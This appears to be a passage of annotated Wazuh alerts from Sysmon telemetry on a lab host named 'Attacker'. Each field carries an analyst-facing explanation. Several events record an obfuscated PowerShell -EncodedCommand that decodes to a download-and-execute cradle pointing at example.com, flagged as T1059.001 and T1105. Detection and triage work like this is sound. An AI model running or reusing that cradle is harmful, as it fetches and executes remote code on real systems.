data.win.eventdata.parentProcessGuid: {94294ddc-bda0-680a-a60b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 15520 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 94 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534375.1867923 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:33.2686532Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285352 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:33.220
ProcessGuid: {94294ddc-bda3-680a-a80b-000000000e00}
ProcessId: 6888
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_em23qzpd.dwf.ps1
CreationUtcTime: 2025-04-24 22:39:33.220
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:33.220 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bda3-680a-a80b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 6888 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_em23qzpd.dwf.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:33.220 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 91 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534379.1870688 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:36.5833716Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285381 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:34.873
ProcessGuid: {94294ddc-bda6-680a-ab0b-000000000e00}
ProcessId: 9052
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bda3-680a-a80b-000000000e00}
ParentProcessId: 6888
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:34.873 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bda6-680a-ab0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9052 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bda3-680a-a80b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 6888 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 95 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534379.1878751 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:36.8501371Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285382 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:36.811
ProcessGuid: {94294ddc-bda6-680a-ab0b-000000000e00}
ProcessId: 9052
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_bh44e1ed.2pr.ps1
CreationUtcTime: 2025-04-24 22:39:36.811
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:36.811 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bda6-680a-ab0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9052 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_bh44e1ed.2pr.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:36.811 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 92 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534385.1881516 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:43.3397900Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285441 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:40.470
ProcessGuid: {94294ddc-bdac-680a-ad0b-000000000e00}
ProcessId: 4284
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bda6-680a-ab0b-000000000e00}
ParentProcessId: 9052
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:40.470 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdac-680a-ad0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4284 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bda6-680a-ab0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 9052 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 96 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534385.1889579 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:43.5281312Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285444 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:43.503
ProcessGuid: {94294ddc-bdac-680a-ad0b-000000000e00}
ProcessId: 4284
